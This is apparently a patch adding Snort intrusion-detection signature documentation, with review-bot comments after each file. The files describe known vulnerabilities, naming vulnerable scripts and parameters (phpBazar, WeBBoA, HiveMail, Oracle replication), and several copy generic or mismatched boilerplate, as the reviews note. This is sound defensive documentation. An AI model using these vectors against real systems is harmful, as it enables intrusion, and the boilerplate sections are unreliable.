+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
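Review bot: "Expoit" in Ease of Attack should be "Exploit", and "multiple malformed request" in Attack Scenarios should be "requests". Additional References is empty despite Corrective Action pointing the reader to vendor supplied patches; cite the vendor advisory.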
--- /dev/null
+++ b/doc/signatures/872.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+872
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
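Review bot: this file is identical to 1211.txt apart from the Sid, including the "running ona web server" typo and "attackers choosing"; fix the typos in both files and state which CGI script each rule actually matches so the two documents differ in substance.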
--- /dev/null
+++ b/doc/signatures/2515.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2515
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of the Private
+Communications Transport (PCT) protocol.
+
+--
+Impact:
+Execution of arbitrary code. Unauthorized administrative access to an
+affected host.
+
+--
+Detailed Information:
+A vulnerability exists in the handling of PCT requests that
+can be manipulated to give an attacker the opportunity to execute
+arbitrary code of their choosing leading to a possible remote
+administrative compromize of an affected host.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003 and XP systems using PCT
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted PCT request to an affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the use of PCT
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
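Review bot: typos "compromize" (Detailed Information) and "attcker" (Attack Scenarios); the two Corrective Action lines lack terminal periods. Additional References is empty for a vulnerability the text attributes to the Microsoft SSL library; a vendor advisory link should be cited so the reader can find the patches referenced in Corrective Action.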
--- /dev/null
+++ b/doc/signatures/100000828.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000828
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "HiveMail" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "cond" parameter in the "address.view.php" script used by the "HiveMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using HiveMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
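Review bot: the Impact section is the generic "system integrity compromise ... execution of arbitrary code" template text, but the vulnerability documented is a cross site scripting flaw whose Attack Scenarios describes stealing information from a user who clicks a malicious link; Impact should describe script execution in the victim's browser and theft of that user's session or data rather than server compromise. "All systems running CGI applications using HiveMail" under Affected Systems is garbled; "All systems running HiveMail" would do. The file also starts with two blank lines before "Rule:", and the separators after Sid, Affected Systems and Contributors lack the blank line used elsewhere.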
--- /dev/null
+++ b/doc/signatures/2406.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2406
+
+--
+Summary:
+This event is generated when an attempt is made to access an APC device
+using a known default administrative account and password via Telnet.
+
+--
+Impact:
+Serious. Unauthorized administrative access to the device.
+
+--
+Detailed Information:
+The APC Management card uses a known default administrative name and
+password. This rule generates an event when these credentials are used
+in a Telnet session. If this account and password have not been changed
+this can lead to unauthorized administrative access to the device.
+
+--
+Affected Systems:
+	APC WEB/SNMP Management Card (9606) Firmware 3.0 and 3.0.1
+
+--
+Attack Scenarios:
+An attacker may try to use this password and username combination to
+gain access to an affected device.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Change the administrative account username and password.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
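Review bot: False Positives says "None known." but this rule matches the default credential string itself, so a legitimate administrator logging in with the unchanged default account triggers it exactly as an attacker would; the section should state that, and point the analyst to the Corrective Action step of changing the account. Corrective Action could also note that the credentials are visible to the sensor only because Telnet carries them in cleartext, so the management interface should be moved to an encrypted channel or restricted to a management network, not merely re-credentialed. Minor: Affected Systems names firmware 3.0 and 3.0.1 only, while Detailed Information implies any card still running the default account is affected.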
--- /dev/null
+++ b/doc/signatures/2132.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 2132
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in Synchrologic Email Accelerator running on Microsoft IIS. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a weakness in the Synchrologic Email Accelerator application.
+
+The attacker may be trying to gain information on the list of users allowed to use the service, this may be the prelude to an attack against the host using that information.
+
+--
+Affected Systems:
+Any host using Synchrologic Email Accelerator.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the list of authorized users for the application. The attacker might then gain access to the application as a valid user.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
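Review bot: neither Summary nor Detailed Information says what the rule actually matches (which file or URI on the Synchrologic Email Accelerator install is being requested), so an analyst cannot judge the event from this documentation; name the resource the rule inspects and the "sensitive file" that Attack Scenarios alludes to. Also "...allowed to use the service, this may be the prelude..." is a comma splice, "Sid: 2132" is on one line unlike the other files in this patch, and Additional References is empty where a vendor advisory would help.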
--- /dev/null
+++ b/doc/signatures/543.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+543
+
+--
+Summary:
+This event is generated when an attempt is made to store a file named
+"1mb" on an ftp server.
+
+--
+Impact:
+Possible abuse ftp behavior by hordes of warez sites, and the
+existance of (potentially) illegal files/software on an ftp server.
+
+--
+Detailed Information:
+Warez sites have been known to name "warez" files by their size.  Large
+files are split into smaller, more manageable chunks, and allow warez
+sites to store large files on ftp sites in a semi-organized manner.
+
+--
+Affected Systems:
+ All FTP servers
+
+--
+Attack Scenarios:
+As part of an attempt to store elite warez on an ftp server, an
+attacker named the file "1mb" to indicate it's size.  This file is
+likely part of an archive that represents a larger, most likely
+illegal copy of media.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required
+
+--
+False Positives:
+If a legitimate user has a legitimate file named "1mb", this rule may
+generate an event.
+
+--
+False Negatives:
+This will detect only files named 1mb.  If a warez site decides to
+start naming their files in a different way this rule will not generate
+an event.
+
+--
+Corrective Action:
+Inspect the ftp server for a file named 1mb. If it exists, determine
+if the file is legitimate, or if it was deposited by someone attempting
+to use the server to distribute non-legitimate files.
+
+Furthermore, evaluate the need for ftp write access.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
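Review bot: the Impact sentence "Possible abuse ftp behavior by hordes of warez sites, and the existance of..." is ungrammatical and misspells "existence"; suggest "Possible abuse of the FTP server by warez distribution sites, and the presence of (potentially) illegal files on the server." In Attack Scenarios "it's size" should be "its size". The False Positives and False Negatives entries here are a good model for the other files in this patch because they state the exact condition and its limit; Corrective Action might add checking the FTP server's transfer log for the upload of that filename, since the rule only sees the STOR on the wire. Whitespace: "Rule:  " and the "-- " before Additional References carry trailing spaces.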
--- /dev/null
+++ b/doc/signatures/3039.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3039
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
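Review bot: Detailed Information describes the flaw as an integer overflow in memory allocation while Attack Scenarios describes overflowing "a buffer containing the information for the access control lists"; the two should agree on the mechanism (an integer overflow in a size computation that yields an undersized buffer, if that is what is meant). Typos: "heterogenous" should be "heterogeneous", and "server.The problem" is missing a space. Corrective Action "Apply the appropriate vendor supplied patch" could name the fixed release given that Affected Systems is "Samba 3.0.8 and prior", and Additional References is empty. Trailing spaces on "Rule: ", "Sid: ", "Summary: ", "Impact: " and several "-- " lines.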
--- /dev/null
+++ b/doc/signatures/1130.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1130
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
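Review bot: this file is generic boilerplate (the same text appears for sids 1807 and 1099 later in this patch) and nothing in Summary or Detailed Information says what sid 1130 actually matches, so an analyst seeing the alert learns nothing about the request that fired it; each of these files should name the URI or application the rule looks for and tailor Affected Systems and Attack Scenarios to it rather than "All systems using a web server" and "attack scenarios are legion". Minor: "attackers choosing" should be "attacker's choosing", and several lines end in trailing whitespace.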
--- /dev/null
+++ b/doc/signatures/1807.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1807
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
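Review bot: the body is word for word the text of 1130.txt earlier in this patch; apart from the sid number it carries nothing specific to sid 1807. Same request as for that file: state the resource the rule inspects and make Affected Systems and Attack Scenarios match it, otherwise two alerts with different sids read identically.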
--- /dev/null
+++ b/doc/signatures/3439.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3439
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
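Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") does not match Detailed Information, which describes malformed RPC DCOM data sent to an RPC port; one of the two is wrong for this sid and the analyst needs the right one to triage the alert. Typo: "Expoit code exists" should be "Exploit code exists". Corrective Action is good in that it names concrete ports (135, 139 and 445, TCP and UDP) to filter at the perimeter; Additional References should cite the vendor bulletin for the fix rather than being empty.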
--- /dev/null
+++ b/doc/signatures/100000317.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+100000317
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "phpBazar" application running on a webserver. 
+Access to the file "classified_right.php" using a remote file being passed as 
+the "language_dir" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "language_dir" parameter in the "classified_right.php" 
+script used by the "phpBazar" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpBazar
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
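Review bot: the third paragraph of Detailed Information and the whole of Attack Scenarios are about credential-validation weaknesses and "supplying his/her own credentials", which is the generic CGI-authentication boilerplate and not a remote file include; for this sid the scenario is an attacker-hosted file URL supplied in the "language_dir" parameter of "classified_right.php", which is what the first paragraph already says. Replace those two passages with RFI-specific text, and in Corrective Action add disabling remote file inclusion in the PHP interpreter configuration alongside patching. Typos: "ona web server", the redundant "exploitation attempt has been attempted", and "attackers choosing".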
--- /dev/null
+++ b/doc/signatures/3168.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3168
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
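Review bot: duplicate of 3439.txt earlier in this patch with only the sid changed, and it inherits the same problem: Attack Scenarios describes an overly long filename over a network share while Detailed Information describes malformed RPC DCOM requests. Sids 3168, 3243, 3327 and 3439 presumably cover different RPC DCOM rules (different transports or request types); each file should say which, otherwise four alerts with different sids read identically. "Expoit" typo again.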
--- /dev/null
+++ b/doc/signatures/100000459.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000459
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "WeBBoA" application running on a webserver. Access to the 
+file "yeni_host.asp" with SQL commands being passed as the "id" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "id" parameter in the "yeni_host.asp" script used by the 
+"WeBBoA" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using WeBBoA
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
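Review bot: the third paragraph of Detailed Information (credentials of a client host, trust relationships) is generic CGI boilerplate that does not describe SQL injection through the "id" parameter of "yeni_host.asp"; drop it or replace it with what the rule actually sees (SQL keywords in that parameter). Corrective Action stops at patching; since Attack Scenarios itself says the problem is user input passed unsanitized to the database, it should also recommend parameterised queries and input validation in the application. Formatting: missing blank lines before the "--" after "Sid:", "Affected Systems:" and "Contributors:", "ona" should be "on a", and "exploitation attempt has been attempted" is redundant.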
--- /dev/null
+++ b/doc/signatures/1099.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1099
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
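Review bot: third copy of the generic web-server text used for sids 1130 and 1807 in this patch; nothing distinguishes sid 1099 from the other two. Name the request or URI the rule matches so the three alerts can be told apart, and adjust Affected Systems accordingly.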
--- /dev/null
+++ b/doc/signatures/3327.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3327
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
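Review bot: same text as 3439.txt and 3168.txt in this patch, with the same mismatch (Attack Scenarios: long filename over a network share; Detailed Information: malformed RPC DCOM request) and the same "Expoit" typo. Fix once and apply to all four RPC DCOM files (3168, 3243, 3327, 3439) together, stating what differs between them.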
--- /dev/null
+++ b/doc/signatures/2638.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2638
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "drop_master_repobject" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck630.html
+
+--
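Review bot: False Negatives is empty; either "None known." like the other sections or, more usefully, a note that the rule keys on a long string in the "gname" parameter and will miss an overflow delivered through another parameter of "drop_master_repobject". The sentence about setting the $ORACLE_PORTS variable to "any" on Windows is detection-engine port configuration, not a property of the vulnerability, yet it sits in Detailed Information; move it to Corrective Action or a configuration note and say why Windows installations need it. Also "a Oracle database" should be "an Oracle database", and Ease of Attack "Simple." sits oddly next to an Attack Scenarios that requires a valid database login; "Simple, given valid database credentials" would be accurate.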
--- /dev/null
+++ b/doc/signatures/913.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+913
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
